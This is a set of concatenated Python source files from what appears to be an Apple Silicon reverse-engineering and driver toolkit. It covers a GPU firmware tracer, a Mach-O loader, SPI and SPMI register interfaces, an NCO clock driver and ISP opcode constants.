                    #self.log(f"    tvb_start_addr @ {cmd3d.struct2.tvb_start_addr:#x}:")
                    #if cmd3d.struct2.tvb_start_addr:
                        #chexdump(read(cmd3d.struct2.tvb_start_addr, 0x1000), print_fn=self.log)
                    #self.log(f"    tvb_tilemap_addr @ {cmd3d.struct2.tvb_tilemap_addr:#x}:")
                    #if cmd3d.struct2.tvb_tilemap_addr:
                        #chexdump(read(cmd3d.struct2.tvb_tilemap_addr, 0x1000), print_fn=self.log)
                    # self.log(f"    aux_fb_ptr @ {cmd3d.struct2.aux_fb_ptr:#x}:")
                    # chexdump(read(cmd3d.struct2.aux_fb_ptr, 0x100), print_fn=self.log)
                    #self.log(f"    pipeline_base @ {cmd3d.struct2.pipeline_base:#x}:")
                    #chexdump(read(cmd3d.struct2.pipeline_base, 0x100), print_fn=self.log)

                    self.log(f"  buf_thing @ {cmd3d.buf_thing_addr:#x}: {cmd3d.buf_thing!s}")
                    self.log(f"    unkptr_18 @ {cmd3d.buf_thing.unkptr_18:#x}:")
                    chexdump(read(cmd3d.buf_thing.unkptr_18, 0x80), print_fn=self.log)

                    #self.log(f"  unk_24 @ {cmd3d.unkptr_24:#x}: {cmd3d.unk_24!s}")
                    self.log(f"  struct6 @ {cmd3d.struct6_addr:#x}: {cmd3d.struct6!s}")
                    # self.log(f"    unknown_buffer @ {cmd3d.struct6.unknown_buffer:#x}:")
                    # chexdump(read(cmd3d.struct6.unknown_buffer, 0x1000), print_fn=self.log)
                    self.log(f"  struct7 @ {cmd3d.struct7_addr:#x}: {cmd3d.struct7!s}")
                    self.log(f"  unk_buf_ptr @ {cmd3d.unk_buf_ptr:#x}:")
                    chexdump(kread(cmd3d.unk_buf_ptr, 0x11c), print_fn=self.log)
                    self.log(f"  unk_buf2_ptr @ {cmd3d.unk_buf2_ptr:#x}:")
                    chexdump(kread(cmd3d.unk_buf2_ptr, 0x18), print_fn=self.log)

            for i in wi1.microsequence.value:
                i = i.cmd
                if i.__class__.__name__ != "Finalize3DCmd":
                    continue
                self.log(f" Finalize:")
                cmdfin = i
                #self.log(f"  completion:")
                #chexdump(kread(cmdfin.completion, 0x4), print_fn=self.log)
                # self.log(f"  unkptr_1c @ {cmdfin.unkptr_1c:#x}:")
                # chexdump(kread(cmdfin.unkptr_1c, 0x1000), print_fn=self.log)
                #self.log(f"  unkptr_24 @ {cmdfin.unkptr_24:#x}:")
                #chexdump(kread(cmdfin.unkptr_24, 0x100), print_fn=self.log)
                # self.log(f"  unkptr_34 @ {cmdfin.unkptr_34:#x}:")
                # chexdump(kread(cmdfin.unkptr_34, 0x1000), print_fn=self.log)
                # self.log(f"  unkptr_3c @ {cmdfin.unkptr_3c:#x}:")
                # chexdump(kread(cmdfin.unkptr_3c, 0x1c0), print_fn=self.log)
                # self.log(f"  unkptr_44 @ {cmdfin.unkptr_44:#x}:")
                # chexdump(kread(cmdfin.unkptr_44, 0x40), print_fn=self.log)
                # self.log(f"  unkptr_64 @ {cmdfin.unkptr_64:#x}:")
                # chexdump(kread(cmdfin.unkptr_64, 0x118), print_fn=self.log)

            #self.log(f"  buf_thing @ {wi1.buf_thing_addr:#x}: {wi1.buf_thing!s}")
            #self.log(f"    unkptr_18 @ {wi1.buf_thing.unkptr_18:#x}:")
            #chexdump(read(wi1.buf_thing.unkptr_18, 0x1000), print_fn=self.log)
            self.dump_buffer_manager(wi1.buffer_mgr, kread, read)
            #self.log(f"  unk_emptybuf @ {wi1.unk_emptybuf_addr:#x}:")
            #chexdump(kread(wi1.unk_emptybuf_addr, 0x1000), print_fn=self.log)
            #self.log(f"  tvb_addr @ {wi1.tvb_addr:#x}:")
            #chexdump(read(wi0.tvb_addr, 0x1000), print_fn=self.log)

            s2 = getattr(wi1, "struct_2", None)
            if s2 is not None:
                if self.agxdecode:
                    self.log("Decode Load pipeline")
                    self.uat.invalidate_cache()
                    self.agxdecode.libagxdecode_usc(s2.clear_pipeline.address & ~0xf,
                                                    b"Load pipeline", True)
            #
            # self.log(f"      depth @ {s2.depth_buffer_ptr2:#x}:")
            # data = read(s2.depth_buffer_ptr2, 0x100000)
            # chexdump(data, print_fn=self.log)
            #
            # self.log(f"      depth_meta @ {s2.depth_aux_buffer_ptr2:#x}:")
            # data = read(s2.depth_aux_buffer_ptr2, 0x100000)
            # chexdump(data, print_fn=self.log)

            s1 = getattr(wi1, "struct_1", None)
            if s1 is not None:
                if self.agxdecode:
                    self.log("Decode Store pipeline")
                    self.uat.invalidate_cache()
                    self.agxdecode.libagxdecode_usc(s1.store_pipeline_addr & ~0xf,
                                                    b"Store pipeline", True)

            regs = getattr(wi1, "registers", None)
            if regs is not None:
                for reg in regs:
                    if reg.number == 0x15371:
                        if self.agxdecode:
                            self.log("Decode Load pipeline")
                            self.uat.invalidate_cache()
                            self.agxdecode.libagxdecode_usc(reg.data & ~0xf, b"Load pipeline", True)
                    elif reg.number == 0x15381:
                        if self.agxdecode:
                            self.log("Decode Store pipeline")
                            self.uat.invalidate_cache()
                            self.agxdecode.libagxdecode_usc(reg.data & ~0xf, b"Store pipeline", True)



    def handle_compute(self, wi):
        self.log("Got Compute Work Item")
        self.last_cp = wi

        if wi.cmd.magic == 4:
            wi4 = wi.cmd
            #self.log(f" completion_buf @ {wi4.completion_buf_addr:#x}: {wi4.completion_buf!s} ")
            #chexdump(kread(wi4.completion_buf_addr, 0x1000), print_fn=self.log)
        elif wi.cmd.magic == 3:

            wi3 = wi.cmd

            def kread(off, size):
                return self.uat.ioread(0, off, size)

            context = wi3.context_id
            self.cur_context = context

            ci2 = wi3.compute_info2

            read = self.read_func

            self.log(f" encoder end = {ci2.encoder_end:#x}")
            chexdump(read(ci2.encoder_end, 0x400), print_fn=self.log)

            self.log(f" context_id = {context:#x}")

            self.log(" high page:")
            chexdump(read(0x6fffff8000, 0x4000), print_fn=self.log)

            if getattr(wi3, "compute_info", None):
                ci = wi3.compute_info
                self.log(f" encoder = {ci.encoder:#x}")
                chexdump(read(ci.encoder, 0x4000), print_fn=self.log)
                self.log(f" deflake:")
                chexdump(read(ci.iogpu_deflake_1, 0x8000), print_fn=self.log)

                if ci.helper_arg != 0:
                    layout = HelperArg.parse_stream(self.get_stream(context, ci.helper_arg))
                    self.log(f" Layout:")
                    self.log(f"   core_stride: {layout.core_stride:#x}")
                    self.log(f"   alloc_size_map: {layout.alloc_size_map}")
                    self.log(f"   max_subgroups: {layout.max_subgroups}")
                    self.log(f"   core list: {list(layout.core_list)}")

                    buckets = 16
                    max_cores = max(layout.core_list) + 1

                    avail_buckets = sorted(list(set(layout.alloc_size_map)))
                    max_bucket = max(avail_buckets)

                    for core in range(max_cores):
                        core_base = ci.helper_arg + HelperArg.sizeof() + layout.core_stride * 4 * core
                        layout = HelperArg.parse_stream(self.get_stream(context, ci.helper_arg))
                        counts = Array(buckets, Int32ul).parse_stream(self.get_stream(context, core_base))
                        sg_buffers = Array(max_bucket + 1, SubBufferList).parse_stream(self.get_stream(context, core_base + buckets * 4))
                        self.log(f"   Core {core}")
                        for bucket in avail_buckets:
                            max_sg = layout.max_subgroups[bucket]
                            self.log(f"     Bucket {bucket}")
                            self.log(f"       Max subgroups: {max_sg}")
                            self.log(f"       Count: {counts[bucket]}")
                            buf_list = sg_buffers[bucket]

                            for i in range(max_sg):
                                row = buf_list.buffers[i]
                                first = row[0]
                                if not first & 1:
                                    self.log(f"       [{i:3d}] Missing?")
                                else:
                                    bits = len(bin(first)[::-1].split("0")[0])
                                    mask = ~((1 << bits) - 1)
                                    block_size = 0x400 << (2 * (bits - 1))
                                    s = [((i & mask) << 8) for i in row if i & 1]

                                    self.log(f"       [{i:3d}] block={block_size:#x} | {' '.join(map(hex, s))}")
                                    for j, block in enumerate(s):
                                        self.log(f"         Block {j}")
                                        chexdump(read(block, block_size), print_fn=self.log)

            regs = getattr(wi3, "registers", None)
            if regs is not None:
                for reg in regs:
                    if reg.number == 0x1a420: # encoder
                        self.log(f"      encoder @ {reg.data:#x}:")
                        data = read(reg.data, 0x4000)
                        chexdump(data, print_fn=self.log)

            if self.agxdecode:
                if getattr(wi3, "compute_info", None):
                    ci = wi3.compute_info
                    self.log("Decode CDM")
                    self.uat.invalidate_cache()
                    self.agxdecode.libagxdecode_cdm(ci.encoder, b"CDM", True)

    def ignore(self, addr=None):
        if addr is None:
            addr = self.last_msg.cmdqueue_addr
        self.ignorelist += [addr & 0xfff_ffffffff]

    def kick(self, val):
        if not self.state.active:
            return

        self.log(f"kick~! {val:#x}")
        self.mon.poll()

        if val == 0x10: # Kick Firmware
            self.log("KickFirmware, polling")
            self.uat.invalidate_cache()
            for chan in self.channels:
                chan.poll()
            return

        if val == 0x11: # Device Control
            channel = 12
            self.uat.invalidate_cache()

        elif val < 0x10:
            type = val & 3
            assert type != 3
            priority = (val >> 2) & 3
            channel = type + priority * 3
            self.uat.invalidate_cache()

        else:
            raise(Exception("Unknown kick type"))

        self.channels[channel].poll()

        ## if val not in [0x0, 0x1, 0x10, 0x11]:
        #if self.last_msg and isinstance(self.last_msg, (RunCmdQueue, DeviceControl_17)):
            #self.hv.run_shell()

            #self.last_msg = None

        # check the gfx -> cpu channels
        for chan in self.channels[13:]:
            chan.poll()

    def fwkick(self, val):
        if not self.state.active:
            return

        self.log(f"FW Kick~! {val:#x}")
        self.mon.poll()

        if val == 0x00: # Kick FW control
            channel = len(self.channels) - 1
        else:
            raise(Exception("Unknown kick type"))

        self.channels[channel].poll()

        # check the gfx -> cpu channels
        for chan in self.channels[13:]:
            chan.poll()

    def pong(self):
        if not self.state.active:
            return

        self.log("pong~!");
        self.mon.poll()

        # check the gfx -> cpu channels
        for chan in self.channels[13:]:
            chan.poll()

    def trace_uatrange(self, ctx, start, size, name=None, off=0):
        start &= 0xfff_ffffffff
        ranges = self.uat.iotranslate(ctx, start, size)
        iova = start
        for range in ranges:
            pstart, psize = range
            if pstart:
                self.log(f"trace {name} {start:#x}/{iova:#x} [{pstart:#x}:{psize:#x}] +{off:#x}")
                self.hv.add_tracer(irange(pstart, psize), f"GPUVM",
                           mode=TraceMode.ASYNC,
                           read=self.event_gpuvm,
                           write=self.event_gpuvm,
                           iova=iova,
                           paddr=pstart,
                           name=name,
                           base=start - off)
            iova += psize

    def untrace_uatrange(self, ctx, start, size):
        ranges = self.uat.iotranslate(ctx, start, size)
        for range in ranges:
            start, size = range
            if start:
                self.hv.del_tracer(irange(start, size), f"GPUVM")

    def dump_va(self, ctx):
        data = b''
        dataStart = 0

        def dump_page(start, end, i, pte, level, sparse):
            if i == 0 or sparse:
                if len(data):
                    chexdump32(data, dataStart)
                data = b''
                dataStart = 0
            if MemoryAttr(pte.AttrIndex) != MemoryAttr.Device and pte.OS:
                if dataStart == 0:
                    dataStart = start
                data += self.uat.ioread(0, start, 0x4000)

        self.uat.foreach_page(0, dump_page)
        if len(data):
            chexdump32(data, dataStart)

    def init_state(self):
        super().init_state()
        self.state.active = True
        self.state.initdata = None
        self.state.channel_info = []
        self.state.channels = {}
        self.state.queues = {}
        self.state.queue_seq = 0
        self.state.perf_enabled = False

    def init_channels(self):
        if self.channels:
            return
        #self.channels = []
        for i, chan_info in enumerate(self.state.channel_info):
            print(channelNames[i], chan_info)
            if channelNames[i] == "Stats": # ignore stats
                continue
            elif channelNames[i] == "KTrace": # ignore KTrace
                continue
            elif channelNames[i] == "FWCtl":
                channel_chan = FWCtlChannelTracer(self, chan_info, i)
            else:
                channel_chan = ChannelTracer(self, chan_info, i)
            self.channels.append(channel_chan)

    def pause(self):
        self.clear_gpuvm_tracers()
        if self.state.initdata is None:
            return
        self.clear_uatmap_tracers()
        self.clear_ttbr_tracers()
        self.log("Pausing tracing")
        self.state.active = False
        for chan in self.channels:
            chan.set_active(False)
        for queue in self.cmdqueues.values():
            queue.set_active(False)
        for info_addr in self.state.queues:
            self.state.queues[info_addr].rptr = None
        self.untrace_uatrange(0, self.state.initdata.regionA_addr, 0x4000)
        self.untrace_uatrange(0, self.state.initdata.regionB_addr, 0x6bc0)
        self.untrace_uatrange(0, self.state.initdata.regionC_addr, 0x11d40)

    def resume(self):
        self.uat.invalidate_cache()
        self.add_gpuvm_tracers()
        self.add_uatmap_tracers()
        self.add_ttbr_tracers()
        if self.state.initdata is None:
            return
        self.log("Resuming tracing")
        self.state.active = True
        for chan in self.channels:
            if chan.name == "Stats":
                continue
            chan.set_active(True)
        for queue in self.cmdqueues.values():
            queue.set_active(True)
        self.trace_uatrange(0, self.state.initdata.regionA_addr, 0x4000, name="regionA")
        self.trace_uatrange(0, self.state.initdata.regionB_addr, 0x6bc0, name="regionB")
        #self.trace_uatrange(0, self.state.initdata.regionC_addr, 0x11d40, name="regionC")
        self.trace_uatrange(0, self.state.initdata.regionB.buffer_mgr_ctl_addr, 0x4000, name="Buffer manager ctl")

    def add_mon_regions(self):
        return
        initdata = self.state.initdata
        if initdata is not None:
            self.mon_addva(0, initdata.regionA_addr, 0x4000, "RegionA")
            self.mon_addva(0, initdata.regionB_addr, 0x6bc0, "RegionB")
            self.mon_addva(0, initdata.regionC_addr, 0x11d40, "RegionC")
            #self.mon_addva(0, initdata.regionB.unkptr_170, 0xc0, "unkptr_170")
            #self.mon_addva(0, initdata.regionB.unkptr_178, 0x1c0, "unkptr_178")
            #self.mon_addva(0, initdata.regionB.unkptr_180, 0x140, "unkptr_180")
            self.mon_addva(0, initdata.regionB.unkptr_190, 0x80, "unkptr_190")
            self.mon_addva(0, initdata.regionB.unkptr_198, 0xc0, "unkptr_198")
            # self.mon_addva(0, initdata.regionB.buffer_mgr_ctl_addr, 0x4000, "Buffer manager ctl")
            #self.mon_addva(0, initdata.unkptr_20.unkptr_0, 0x40, "unkptr_20.unkptr_0")
            #self.mon_addva(0, initdata.unkptr_20.unkptr_8, 0x40, "unkptr_20.unkptr_8")

    def clear_gpuvm_range(self, ctx, iova, length):
        while length > 0:
            page = iova & ~0x3fff
            off = iova & 0x3fff
            block = min(0x4000 - off, length)
            page &= 0xfffffffffff
            print(f"Clear {ctx} {page:#x} {block:#x}")
            paddr = self.va_to_pa.get((ctx, page), None)
            if paddr:
                print(f" pa {paddr + off:#x}")
                self.hv.del_tracer(irange(paddr + off, block), f"GPUVM/{ctx}")
            length -= block
            iova += block

    def clear_stats_tracers(self):
        if not self.state.initdata:
            return

        self.clear_gpuvm_range(
            0,
            self.state.initdata.regionB.channels.Stats.state_addr,
            0x30)
        self.clear_gpuvm_range(
            0,
            self.state.initdata.regionB.channels.Stats.ringbuffer_addr,
            0x100 * StatsSize)

    def pong_init(self, addr):
        self.log("UAT at init time:")
        self.uat.invalidate_cache()
        self.uat.dump(0, log=self.log)
        addr |= 0xfffff000_00000000
        initdata = InitData.parse_stream(self.get_stream(0, addr))

        self.log("Initdata:")
        self.log(initdata)

        self.add_mon_regions()
        self.clear_stats_tracers()

        #self.initdata.regionB.mon(lambda addr, size, name: self.mon_addva(0, addr, size, name))

        self.state.initdata_addr = addr
        self.state.initdata = initdata
        self.state.channel_info = []
        self.state.fwlog_ring2 = initdata.regionB.fwlog_ring2
        channels = initdata.regionB.channels
        for i in channelNames:
            if i == "FWCtl":
                chan_info = initdata.fw_status.fwctl_channel
            else:
                chan_info = channels[i]
            self.state.channel_info.append(chan_info)

        self.init_channels()
        self.mon.poll()

        self.log("Initial commands::")
        for chan in self.channels:
            chan.poll()
        self.log("Init done")

        self.log("Mon regions")
        self.mon.show_regions(log=self.log)

        if self.skip_asc_tracing:
            super().stop()

        if self.pause_after_init:
            self.log("Pausing tracing")
            self.pause()
            self.stop()
        if self.after_init_hook:
            self.after_init_hook()
        if self.shell_after_init:
            self.hv.run_shell()

ChannelTracer = ChannelTracer._reloadcls()



# SPDX-License-Identifier: MIT
from io import BytesIO, SEEK_END, SEEK_SET
import bisect
from construct import *
import subprocess

from .utils import *

__all__ = ["MachO"]

MachOLoadCmdType = "LoadCmdType" / Enum(Int32ul,
    SYMTAB = 0x02,
    UNIXTHREAD = 0x05,
    SEGMENT_64 = 0x19,
    UUID = 0x1b,
    BUILD_VERSION = 0x32,
    DYLD_CHAINED_FIXUPS = 0x80000034,
    FILESET_ENTRY = 0x80000035,
)

MachOArmThreadStateFlavor = "ThreadStateFlavor" / Enum(Int32ul,
    THREAD64 = 6,
)

MachOHeader = Struct(
    "magic" / Hex(Int32ul),
    "cputype" / Hex(Int32ul),
    "cpusubtype" / Hex(Int32ul),
    "filetype" / Hex(Int32ul),
    "ncmds" / Hex(Int32ul),
    "sizeofcmds" / Hex(Int32ul),
    "flags" / Hex(Int32ul),
    "reserved" / Hex(Int32ul),
)

MachOVmProt = FlagsEnum(Int32sl,
    PROT_READ = 0x01,
    PROT_WRITE = 0x02,
    PROT_EXECUTE = 0x04,
)

MachOCmdSymTab = Struct(
    "symoff" / Hex(Int32ul),
    "nsyms" / Int32ul,
    "stroff" / Hex(Int32ul),
    "strsize" / Hex(Int32ul),
)

MachOCmdUnixThread = GreedyRange(Struct(
    "flavor" / MachOArmThreadStateFlavor,
    "data" / Prefixed(ExprAdapter(Int32ul, obj_ * 4, obj_ / 4), Switch(this.flavor, {
        MachOArmThreadStateFlavor.THREAD64: Struct(
            "x" / Array(29, Hex(Int64ul)),
            "fp" / Hex(Int64ul),
            "lr" / Hex(Int64ul),
            "sp" / Hex(Int64ul),
            "pc" / Hex(Int64ul),
            "cpsr" / Hex(Int32ul),
            "flags" / Hex(Int32ul),
        )
    })),
))

NList = Struct(
    "n_strx" / Hex(Int32ul),
    "n_type" / Hex(Int8ul),
    "n_sect" / Hex(Int8ul),
    "n_desc" / Hex(Int16sl),
    "n_value" / Hex(Int64ul),
)

MachOCmdSegment64 = Struct(
    "segname" / PaddedString(16, "ascii"),
    "vmaddr" / Hex(Int64ul),
    "vmsize" / Hex(Int64ul),
    "fileoff" / Hex(Int64ul),
    "filesize" / Hex(Int64ul),
    "maxprot" / MachOVmProt,
    "initprot" / MachOVmProt,
    "nsects" / Int32ul,
    "flags" / Hex(Int32ul),
    "sections" / GreedyRange(Struct(
        "sectname" / PaddedString(16, "ascii"),
        "segname" / PaddedString(16, "ascii"),
        "addr" / Hex(Int64ul),
        "size" / Hex(Int64ul),
        "offset" / Hex(Int32ul),
        "align" / Hex(Int32ul),
        "reloff" / Hex(Int32ul),
        "nreloc" / Hex(Int32ul),
        "flags" / Hex(Int32ul),
        "reserved1" / Hex(Int32ul),
        "reserved2" / Hex(Int32ul),
        "reserved3" / Hex(Int32ul),
    )),
)

MachOFilesetEntry = Struct(
    "addr" / Hex(Int64ul),
    "offset" / Hex(Int64ul),
    "entryid" / Hex(Int32ul),
    "reserved" / Hex(Int32ul),
    "name" / CString("ascii"),
)

MachOCmd = Struct(
    "cmd" / Hex(MachOLoadCmdType),
    "args" / Prefixed(ExprAdapter(Int32ul, obj_ - 8, obj_ + 8), Switch(this.cmd, {
        MachOLoadCmdType.SYMTAB: MachOCmdSymTab,
        MachOLoadCmdType.UNIXTHREAD: MachOCmdUnixThread,
        MachOLoadCmdType.SEGMENT_64: MachOCmdSegment64,
        MachOLoadCmdType.UUID: Hex(Bytes(16)),
        MachOLoadCmdType.FILESET_ENTRY: MachOFilesetEntry,
    }, default=GreedyBytes)),
)

MachOFile = Struct(
    "header" / MachOHeader,
    "cmds" / Array(this.header.ncmds, MachOCmd),
)

class MachO:
    def __init__(self, data):
        if isinstance(data, bytes):
            self.io = BytesIO(data)
        else:
            self.io = data

        self.off = self.io.tell()
        self.io.seek(0, SEEK_END)
        self.end = self.io.tell()
        self.size = self.end - self.off
        self.io.seek(self.off, SEEK_SET)
        self.obj = MachOFile.parse_stream(self.io)
        self.symbols = {}
        self.load_info()
        self.load_fileset()

    def load_info(self):
        self.vmin, self.vmax = (1 << 64), 0
        self.entry = None
        for cmd in self.obj.cmds:
            if cmd.cmd == MachOLoadCmdType.SEGMENT_64:
                self.vmin = min(self.vmin, cmd.args.vmaddr)
                self.vmax = max(self.vmax, cmd.args.vmaddr + cmd.args.vmsize)
            elif cmd.cmd == MachOLoadCmdType.UNIXTHREAD:
                self.entry = cmd.args[0].data.pc

    def prepare_image(self, load_hook=None):
        memory_size = self.vmax - self.vmin

        image = bytearray(memory_size)

        for cmd in self.get_cmds(MachOLoadCmdType.SEGMENT_64):
            dest = cmd.args.vmaddr - self.vmin
            end = min(self.size, cmd.args.fileoff + cmd.args.filesize)
            size = end - cmd.args.fileoff
            print(f"LOAD: {cmd.args.segname} {size} bytes from {cmd.args.fileoff:x} to {dest:x}")
            self.io.seek(self.off + cmd.args.fileoff)
            data = self.io.read(size)
            if load_hook is not None:
                data = load_hook(data, cmd.args.segname, size, cmd.args.fileoff, dest)
            image[dest:dest + size] = data
            if cmd.args.vmsize > size:
                clearsize = cmd.args.vmsize - size
                if cmd.args.segname == "PYLD":
                    print("SKIP: %d bytes from 0x%x to 0x%x" % (clearsize, dest + size, dest + size + clearsize))
                    memory_size -= clearsize - 4 # leave a payload end marker
                    image = image[:memory_size]
                else:
                    print("ZERO: %d bytes from 0x%x to 0x%x" % (clearsize, dest + size, dest + size + clearsize))
                    image[dest + size:dest + cmd.args.vmsize] = bytes(clearsize)

        return image

    def get_cmds(self, cmdtype):
        for cmd in self.obj.cmds:
            if cmd.cmd == cmdtype:
                yield cmd

    def get_cmd(self, cmdtype):
        cmds = list(self.get_cmds(cmdtype))
        if len(cmds) == 0:
            raise Exception(f"No commands of type {cmdtype}")
        if len(cmds) > 1:
            raise Exception(f"More than one commands of type {cmdtype} (found {len(cmd)})")
        return cmds[0]

    def load_fileset(self):
        self.subfiles = {}

        for fe in self.get_cmds(MachOLoadCmdType.FILESET_ENTRY):
            self.io.seek(self.off + fe.args.offset)
            subfile = MachO(self.io)
            self.subfiles[fe.args.name] = subfile
            for seg in subfile.get_cmds(MachOLoadCmdType.SEGMENT_64):
                self.symbols[f"{fe.args.name}:{seg.args.segname}"] = seg.args.vmaddr

    def add_symbols(self, filename, syms, demangle=False):
        try:
            subfile = self.subfiles[filename]
        except KeyError:
            raise Exception(f"No fileset entry for {filename}")

        sym_segs = {}
        for sym_seg in syms.get_cmds(MachOLoadCmdType.SEGMENT_64):
            sym_segs[sym_seg.args.segname] = sym_seg

        syms.load_symbols(demangle=demangle)
        symtab = [(v, k) for (k, v) in syms.symbols.items()]
        symtab.sort()

        for seg in subfile.get_cmds(MachOLoadCmdType.SEGMENT_64):
            if seg.args.segname not in sym_segs:
                continue

            sym_seg = sym_segs[seg.args.segname]

            start = bisect.bisect_left(symtab, (sym_seg.args.vmaddr, ""))
            end = bisect.bisect_left(symtab, (sym_seg.args.vmaddr + sym_seg.args.vmsize, ""))

            for addr, sym in symtab[start:end]:
                sname = f"{filename}:{sym}"
                self.symbols[sname] = addr - sym_seg.args.vmaddr + seg.args.vmaddr

    def load_symbols(self, demangle=False):
        self.symbols = {}

        cmd = self.get_cmd(MachOLoadCmdType.SYMTAB)

        nsyms = cmd.args.nsyms
        length = NList.sizeof() * nsyms
        self.io.seek(self.off + cmd.args.symoff)
        symdata = self.io.read(length)

        symbols = Array(nsyms, NList).parse(symdata)

        symbols_dict = {}
        for i in symbols:
            off = cmd.args.stroff + i.n_strx
            self.io.seek(self.off + off)
            name = self.io.read(1024).split(b"\x00")[0].decode("ascii")
            symbols_dict[name] = i.n_value

        if demangle:
            names = list(symbols_dict.keys())
            argv = ["c++filt"]
            argv += names

            with subprocess.Popen(argv, stdin=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
                demangled, _ = proc.communicate()

            demangled = demangled.decode("ascii").split("\n")[:-1]
            for name_mangled, name_demangled in zip(names, demangled):
                self.symbols[name_demangled] = symbols_dict[name_mangled]
        else:
            self.symbols = symbols_dict

if __name__ == "__main__":
    import sys
    macho = MachO(open(sys.argv[1], "rb").read())

    if len(sys.argv) > 2:
        syms = MachO(open(sys.argv[2], "rb").read())
        macho.add_symbols("com.apple.kernel", syms)

        symtab = [(v, k) for (k, v) in macho.symbols.items()]
        symtab.sort()
        for addr, name in symtab:
            print(f"0x{addr:x} {name}")



# SPDX-License-Identifier: MIT

from ..hw.spi import *
from ..hv import TraceMode
from ..utils import *
from . import ADTDevTracer

class SPITracer(ADTDevTracer):
    REGMAPS = [SPIRegs]
    NAMES = ["spi"]



# SPDX-License-Identifier: MIT
import struct

from ..utils import *

__all__ = ["SPMI"]

CMD_EXT_WRITE   = 0x00
CMD_EXT_READ    = 0x20
CMD_EXT_WRITEL  = 0x30
CMD_EXT_READL   = 0x38
CMD_WRITE       = 0x40
CMD_READ        = 0x60
CMD_ZERO_WRITE  = 0x80

class R_CMD(Register32):
    REG         = 31, 16
    ACTIVE      = 15
    SLAVE_ID    = 14, 8
    CMD         = 7, 0

class R_STATUS(Register32):
    RX_EMPTY    = 24
    RX_COUNT    = 23, 16
    TX_EMPTY    = 8
    TX_COUNT    = 7, 0

class SPMIRegs(RegMap):
    STATUS      = 0x00, R_STATUS
    CMD         = 0x04, R_CMD
    REPLY       = 0x08, Register32
    IRQ_FLAG    = 0x80, Register32

class SPMI:
    def __init__(self, u, adt_path):
        self.u = u
        self.p = u.proxy
        self.iface = u.iface
        self.base = u.adt[adt_path].get_reg(0)[0]
        self.regs = SPMIRegs(u, self.base)

    def read(self, slave, reg, size):
        while not self.regs.STATUS.reg.RX_EMPTY:
            print(">", self.regs.REPLY.val)

        self.regs.CMD.reg = R_CMD(REG = reg, ACTIVE=1, SLAVE_ID = slave, CMD = CMD_EXT_READL | (size - 1))

        buf = b""

        left = size + 4
        while left > 0:
            while self.regs.STATUS.reg.RX_EMPTY:
                pass
            v = self.regs.REPLY.val
            buf += struct.pack("<I", v)
            left -= 4

        return buf[4:4+size]

    def write(self, slave, reg, data):
        while not self.regs.STATUS.reg.RX_EMPTY:
            self.regs.REPLY.val

        size = len(data)
        self.regs.CMD.reg = R_CMD(REG = reg, ACTIVE=1, SLAVE_ID = slave, CMD = CMD_EXT_WRITEL | (size - 1))

        while data:
            blk = (data[:4] + b"\0\0\0")[:4]
            self.regs.CMD.val = struct.unpack("<I", blk)[0]
            data = data[4:]

        while self.regs.STATUS.reg.RX_EMPTY:
            pass
        return self.regs.REPLY.val

    def read8(self, slave, reg):
        return struct.unpack("<B", self.read(slave, reg, 1))[0]

    def read16(self, slave, reg):
        return struct.unpack("<H", self.read(slave, reg, 2))[0]

    def read32(self, slave, reg):
        return struct.unpack("<I", self.read(slave, reg, 4))[0]

    def read64(self, slave, reg):
        return struct.unpack("<Q", self.read(slave, reg, 8))[0]

    def write8(self, slave, reg, val):
        return self.write(slave, reg, struct.pack("<B", val))

    def write16(self, slave, reg, val):
        return self.write(slave, reg, struct.pack("<H", val))

    def write32(self, slave, reg, val):
        return self.write(slave, reg, struct.pack("<I", val))

    def write64(self, slave, reg, val):
        return self.write(slave, reg, struct.pack("<Q", val))



# SPDX-License-Identifier: MIT

__all__ = ["NCO"]

def galois_lfsr(init, poly):
	state = init
	for i in range((1 << poly.bit_length() - 1) - 1):
		if state & 1:
			state = (state >> 1) ^ (poly >> 1)
		else:
			state = (state >> 1)
		yield state

def gen_lookup_tables():
	fwd, inv = dict(), dict()
	lfsr_states = [0] + list(reversed(list(galois_lfsr(0x7ff, 0xa01))))
	for cycle, sr_state in enumerate(lfsr_states):
		fwd[cycle + 2] = sr_state
		inv[sr_state] = cycle + 2
	return fwd, inv


class NCOChannel:
	def __init__(self, parent, base):
		self.parent = parent
		self.base = base
		self.p = parent.u.proxy

	def enabled(self):
		return bool(self.p.read32(self.base) & (1<<31))

	def enable(self):
		self.p.set32(self.base, 1<<31)

	def disable(self):
		self.p.clear32(self.base, 1<<31)

	def set_rate(self, target):
		was_enabled = self.enabled()
		for off, val in enumerate(NCO.calc_regvals(self.parent.fin, target)):
			self.p.write32(self.base + off*4, val)
		if was_enabled:
			self.enable()

	def get_rate(self):
		return NCO.calc_rate(self.parent.fin,
			[self.p.read32(self.base + off*4) for off in range(4)]
		)

	def __repr__(self):
		return f"<NCO channel @ 0x{self.base:x}>"


class NCO:
	TBL, TBL_INV = gen_lookup_tables()

	@classmethod
	def calc_rate(self, fin, regvals):
		try:
			div = self.TBL_INV[regvals[1] >> 2] << 2 | regvals[1] & 3
		except KeyError:
			raise ValueError("bad configuration")
		inc1 = regvals[2]
		inc2 = regvals[3] - 0x1_0000_0000
		return 2 * fin * (inc1 - inc2) // (div * (inc1 - inc2) + inc1)

	@classmethod
	def calc_regvals(self, fin, fout):
		div = 2 * fin // fout
		inc1 = (2 * fin - div * fout)
		inc2 = inc1 - fout
		try:
			return [0, self.TBL[div >> 2] << 2 | div & 3, inc1, inc2 + 0x1_0000_0000]
		except KeyError:
			raise ValueError("target rate out of range")

	def __init__(self, u, devpath, stride=0x4000):
		self.u = u
		node = u.adt[devpath]
		self.fin = u.adt["/arm-io"].clock_frequencies[node.clock_ids[0] - 256]

		reg = node.get_reg(0)
		self.chans = [
			NCOChannel(self, base)
			for base in range(reg[0], reg[0] + reg[1], stride)
		]

	def __getitem__(self, idx):
		return self.chans[idx]



# SPDX-License-Identifier: MIT
# isp_opcodes.py: autogenerated file

CISP_CMD_START					     = 0x0000
CISP_CMD_STOP					     = 0x0001
CISP_CMD_CONFIG_GET				     = 0x0003
CISP_CMD_PRINT_ENABLE				     = 0x0004
CISP_CMD_BUILDINFO				     = 0x0006
CISP_CMD_SET_ISP_PMU_BASE			     = 0x0011
CISP_CMD_RPC_ENABLE				     = 0x0013
CISP_CMD_PMP_CTRL_SET				     = 0x001c
CISP_CMD_TRACE_ENABLE				     = 0x001d
CISP_CMD_FLICKER_SENSOR_SET              = 0x0024
CISP_CMD_CH_START				     = 0x0100
CISP_CMD_CH_STOP				     = 0x0101
CISP_CMD_CH_BUFFER_RETURN			     = 0x0104
